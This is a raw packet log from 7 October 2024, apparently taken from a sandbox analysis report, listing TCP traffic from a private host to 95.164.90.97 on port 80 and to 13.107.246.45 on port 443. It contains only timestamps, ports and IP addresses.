Oct 7, 2024 03:15:42.840071917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840099096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840109110 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840133905 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840137959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840167046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840178967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840210915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840220928 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840254068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840270042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840289116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840301991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840333939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840341091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840374947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840399027 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840418100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840435028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840468884 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840478897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840512991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840521097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840555906 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840564966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840599060 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840607882 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840641975 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840651989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840687037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840696096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840728998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840739012 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840775967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840780020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840812922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840826035 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840857029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840868950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840914011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840920925 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.840966940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.840972900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841008902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841020107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841041088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841054916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841078043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841087103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841109037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841124058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841141939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841155052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841177940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841190100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841212034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841223001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841245890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841257095 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841279984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841294050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841315985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841327906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841362000 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841367960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841401100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841414928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841444969 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841453075 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841497898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841505051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841536999 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841553926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841581106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841588974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841623068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841639996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841669083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841674089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841706991 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841720104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841753960 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841759920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841794014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841818094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841839075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841845036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841892004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841896057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841939926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.841948032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841980934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.841993093 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842025995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842036009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842065096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842087030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842109919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842118025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842164993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842170954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842221022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842223883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842257977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842272997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842292070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842304945 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842325926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842336893 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842367887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842377901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842411995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842423916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842461109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842478037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842497110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842509031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842530966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842541933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842566013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842585087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842600107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842613935 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842633009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842647076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842664957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842680931 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842699051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842710972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842731953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842741013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842767000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842778921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842801094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842814922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842840910 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842850924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842875957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842886925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842911005 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842921972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842943907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842957020 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.842978954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.842989922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843014002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843023062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843046904 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843060017 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843081951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843091011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843115091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843128920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843149900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843163013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843183041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843194962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843216896 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843225956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843250990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843264103 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843285084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843297005 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843318939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843332052 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843352079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843364954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843405008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843405962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843441963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843455076 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843476057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843488932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843508959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843522072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843543053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843563080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843575954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843588114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843610048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843636036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843641996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843652964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843677044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843688011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843708992 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843722105 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843744040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843755007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843777895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843791008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843811035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843822956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843843937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843854904 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843959093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.843985081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.843991041 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844006062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844024897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844037056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844058037 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844074965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844093084 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844105959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844126940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844139099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844161034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844176054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844197989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.844208956 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.844243050 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930675983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930749893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930763960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930788040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930804014 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930808067 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930819035 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930845022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930860043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930860996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930885077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930901051 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930907011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930916071 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930934906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930941105 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930955887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930972099 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.930977106 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.930986881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931000948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931020021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931050062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931113958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931159019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931193113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931210995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931231976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931245089 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931248903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931262970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931281090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931303978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931318998 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931319952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931334972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931350946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931359053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931377888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931396961 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931411028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931431055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931437016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931449890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931457996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931468010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931483030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931498051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931539059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931551933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931565046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931580067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931601048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931607008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931619883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931634903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931643963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931649923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931668997 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931675911 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931693077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931708097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931709051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931730986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931737900 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931746960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931761980 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931765079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931777954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931792974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931806087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931808949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931827068 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931840897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:42.931843996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931876898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.931898117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.954788923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:42.959620953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.026608944 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.026918888 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.027403116 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.027435064 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.027703047 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.027714014 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.027904987 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.027911901 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.028346062 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.028353930 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.057698011 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.058438063 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.058461905 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.058938980 CEST	49855	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.058943033 CEST	443	49855	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.116566896 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.117301941 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.117331028 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.117814064 CEST	49856	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.117825985 CEST	443	49856	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.127378941 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.127585888 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.127603054 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.127631903 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.127753973 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.127831936 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.128046036 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.128184080 CEST	49853	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.128206015 CEST	443	49853	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.128221035 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.128439903 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.128448009 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.128463030 CEST	49854	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.128469944 CEST	443	49854	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.133655071 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.133717060 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.133826017 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.135087967 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.135117054 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.135319948 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.135344982 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.135377884 CEST	49858	443	192.168.2.5	13.107.246.45
